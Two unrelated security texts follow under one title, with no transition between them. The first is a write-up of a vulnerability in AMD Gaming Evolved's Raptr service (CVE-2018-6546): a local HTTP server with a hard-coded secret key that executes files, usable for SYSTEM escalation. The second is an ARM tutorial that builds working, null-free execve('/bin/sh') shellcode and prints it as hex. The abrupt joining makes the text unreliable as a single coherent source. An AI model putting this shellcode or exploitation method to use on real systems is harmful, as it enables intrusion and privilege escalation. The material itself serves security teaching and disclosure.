AMD Gaming Evolved exploiting

Background

If you ran an AMD GPU a few years back, you’ve probably come across a piece of software on your computer from Raptr, Inc. If you don’t remember installing it, that’s because for several years it was installed silently alongside your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years: I update my AMD drivers and notice that plays_service.exe has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boilerplate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python-based and has been packaged with something like py2exe. While decompiling python bytecode is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python bytecode in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!”. At first glance it appears to be an error message emitted when certain python objects aren’t created properly. Scrolling up in the function that references it, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success: only one zip file exists, and it is named python35.zip! Its filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled python bytecode files, which I presume to be the application’s core source code and library dependencies.
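A quick way to survey an archive like this is to list the compiled modules it contains. The following is a minimal sketch using the standard zipfile module; the function name list_compiled_modules is illustrative and not part of any tooling mentioned in this post.

```python
import zipfile


def list_compiled_modules(zip_path):
    """Return the sorted names of all compiled bytecode files (.pyc) in a zip archive."""
    with zipfile.ZipFile(zip_path) as archive:
        return sorted(
            name for name in archive.namelist() if name.endswith(".pyc")
        )
```

Calling list_compiled_modules on the extracted archive path gives a list that can then be searched for anything named after the service.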

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephemeral port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.
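For readers unfamiliar with ephemeral ports, the pattern looks roughly like the sketch below. It is not the service’s code: the function name bind_ephemeral is made up, it binds to loopback rather than all interfaces, and the registry write is left out.

```python
import socket


def bind_ephemeral(host="127.0.0.1"):
    """Bind a TCP socket to port 0 so the OS picks a free ephemeral port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, 0))              # port 0 means "any free port"
    sock.listen(1)
    port = sock.getsockname()[1]      # the port the OS actually assigned
    return sock, port
```

Because the port changes on every start, the service has to publish it somewhere, which is why it ends up in the registry.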

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter, which holds the command to be processed. The second is a hash value computed over the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command functions, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.
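The check described above can be sketched as follows. This is a reconstruction under stated assumptions, not the decompiled handler: the hash algorithm (SHA-256), the concatenation order, the JSON field names "data" and "hash", and the key value are all placeholders.

```python
import hashlib
import hmac
import json

# Placeholder only; the real key is hard-coded in the service and is not reproduced here.
SECRET_KEY = b"hypothetical-secret"


def compute_hash(data, key=SECRET_KEY):
    """Hash the command data together with the shared secret (SHA-256 is an assumption)."""
    return hashlib.sha256(data.encode("utf-8") + key).hexdigest()


def is_authorized(body, key=SECRET_KEY):
    """Return True if the JSON body carries a hash that matches its data field."""
    request = json.loads(body)
    expected = compute_hash(request["data"], key)
    return hmac.compare_digest(expected, request["hash"])
```

Whatever the exact construction, a key that ships inside the binary can be extracted by anyone, so the hash only proves that the caller has read the same file.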

The function logic is pretty straightforward. It performs a couple of insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.
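To illustrate why the path resolution narrows the attack surface, here is a portable sketch. It uses os.path.isfile as a stand-in for the failure behavior of win32api.GetShortPathName, and the way the command line is assembled is an assumption rather than the service’s actual logic.

```python
import os


def resolve_existing(path):
    """Stand-in for win32api.GetShortPathName: fail unless the path is a real file."""
    if not os.path.isfile(path):
        raise FileNotFoundError(path)
    return os.path.abspath(path)


def build_command(installer, argument):
    """Build a command line only from parameters that resolve to existing files."""
    return '"%s" "%s"' % (resolve_existing(installer), resolve_existing(argument))
```

A parameter such as "cmd.exe /c whoami" fails the check because no file has that name, so an attacker is limited to pointing the service at files that exist, locally or on a reachable share.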

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – GNU Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.
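The effect of a null-byte on a strcpy-style copy can be simulated in a few lines. This is only a model of the behavior described above; c_strcpy is a made-up helper, not a binding to the C function.

```python
def c_strcpy(source):
    """Mimic strcpy: copy bytes up to, but not including, the first null-byte."""
    end = source.find(b"\x00")
    return source if end == -1 else source[:end]


# A payload with a null-byte in the middle is cut short at that point.
payload = b"\x01\x30\x8f\xe2" + b"\x00" + b"\x0b\x27"
copied = c_strcpy(payload)
```

Here copied holds only the first four bytes, so everything after the null-byte never reaches the target buffer.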

The process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a hex string

UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit(), which has the syscall number 1.
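The size arithmetic can be checked outside of assembly. The sketch below builds the same 13 bytes that .asciz emits and passes them to write(); it writes to a pipe instead of STDOUT purely so the result can be read back, and the helper name write_to_pipe is made up for this example.

```python
import os

message = b"Azeria Labs\n\x00"   # .asciz appends the trailing null-byte
size_of_string = len(message)     # same value as after_string - string


def write_to_pipe(data):
    """Call write() on a pipe and return (bytes written, bytes read back)."""
    read_fd, write_fd = os.pipe()
    try:
        written = os.write(write_fd, data)
        return written, os.read(read_fd, written)
    finally:
        os.close(read_fd)
        os.close(write_fd)
```

The count matches the 13 used in the C example, because sizeof(string) also includes the terminating null-byte.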

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdlib.h>   /* system() is declared here */

int main(void)
{
    system("/bin/sh");
    return 0;
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v ./system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.
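When the trace is long, it can help to pull out just the syscall names. The following sketch assumes the line layout seen in the output above (an optional "[pid N]" prefix followed by name and opening parenthesis); the function name syscall_names is illustrative.

```python
import re

# Optional "[pid N]" prefix, then the syscall name, then "("
SYSCALL_LINE = re.compile(r"^(?:\[pid\s+\d+\]\s+)?(\w+)\(")


def syscall_names(lines):
    """Extract syscall names from strace output lines, skipping non-syscall lines."""
    names = []
    for line in lines:
        match = SYSCALL_LINE.match(line)
        if match:
            names.append(match.group(1))
    return names
```

Lines such as "--- snip --" or "+++ exited with 0 +++" do not start with a syscall name and are ignored.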

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command-line arguments
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output, you can see that the syscall number of execve() is 11. Registers R0 to R2 can be used for the function parameters, and register R7 will store the syscall number.
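The same lookup can be scripted. The sketch below parses a #define line of the form shown in the grep output; it assumes an EABI system where __NR_SYSCALL_BASE is 0, and the function name parse_syscall_define is made up for illustration.

```python
import re

DEFINE = re.compile(r"#define\s+__NR_(\w+)\s+\(__NR_SYSCALL_BASE\s*\+\s*(\d+)\)")


def parse_syscall_define(line, base=0):
    """Return (name, number) from a unistd.h #define line, or None if it does not match."""
    match = DEFINE.search(line)
    if match is None:
        return None
    # base is added to the offset; 0 is assumed here (EABI)
    return match.group(1), base + int(match.group(2))
```

Feeding it the line from the grep output yields the name execve and the number 11.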

Invoking system calls on 32-bit x86 Linux works as follows: First, you place the parameters in registers (EBX, ECX, EDX, and so on). Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 0x80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is what it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start by pointing R0 to our “/bin/sh” string using PC-relative addressing (if you can’t remember why the effective PC starts two instructions ahead of the current one, go to “Data Types and Registers” of the assembly basics tutorial and look at the part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that involve null-bytes.
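Counting the null-bytes by eye is error-prone, so here is a small sketch that does it for the words in the objdump listing above. The words are copied from that listing; the helper names are illustrative.

```python
import struct

# Instruction and data words copied from the objdump listing above
WORDS = [0xE28F000C, 0xE3A01000, 0xE3A02000, 0xE3A0700B,
         0xEF000000, 0x6E69622F, 0x0068732F]


def to_bytes(words):
    """Pack 32-bit words in little-endian order, as they are laid out in memory."""
    return b"".join(struct.pack("<I", word) for word in words)


def count_null_bytes(code):
    """Count the null-bytes in a byte string."""
    return code.count(b"\x00")
```

For this listing, count_null_bytes(to_bytes(WORDS)) returns 7: one each in the add and the two mov #0 instructions, three in the svc, and one from the string terminator.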

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials, you know how to switch from ARM to Thumb mode. If you haven’t, I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial, “Conditional Execution and Branching”.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte
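The two steps above can be modeled on a plain byte buffer. This is a simulation of what the strb instruction does at runtime, not ARM code; patch_terminator is a hypothetical helper.

```python
def patch_terminator(code, offset):
    """Overwrite one placeholder byte with a null-byte, like strb with a zeroed register."""
    patched = bytearray(code)
    patched[offset] = 0
    return bytes(patched)


stored = b"/bin/shX"                     # what is embedded in the shellcode: no null-byte
at_runtime = patch_terminator(stored, 7)  # what execve() sees after the store
```

The stored form is safe to copy with string functions, while the runtime form is the properly terminated path.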

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into its hexadecimal representation. Before doing that, it is a good idea to check whether the shellcode works as a standalone program. But there’s a problem: if we compile our assembly file like we would normally do, it won’t work. The reason for this is that we use the strb operation to modify our code section (.text). This requires the code section to be writable, which can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you can also do the same with a simple python script:

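#!/usr/bin/env python3

import sys

# Read the raw shellcode bytes from the file given as the first argument
with open(sys.argv[1], 'rb') as binary:
    data = binary.read()

# Print every byte as a \xNN escape sequence
print("".join("\\x%02x" % byte for byte in data))

azeria@labs:~$ ./shellcode.py execve3.bin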
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78
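As a final sanity check, the escaped string can be decoded back into bytes and inspected. The sketch below uses the exact string printed above; decode_escaped is an illustrative helper name.

```python
import re

SHELLCODE = (r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40"
             r"\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78")


def decode_escaped(text):
    """Turn a string of \\xNN escapes back into raw bytes."""
    return bytes(int(pair, 16) for pair in re.findall(r"\\x([0-9a-fA-F]{2})", text))


raw = decode_escaped(SHELLCODE)
has_null = b"\x00" in raw
```

The decoded shellcode is 28 bytes long, contains no null-bytes, and ends with the “/bin/shx” placeholder string that gets patched at runtime.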

I hope you enjoyed this introduction to writing ARM shellcode. In the next part you will learn how to write shellcode in the form of a reverse shell, which is a little bit more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.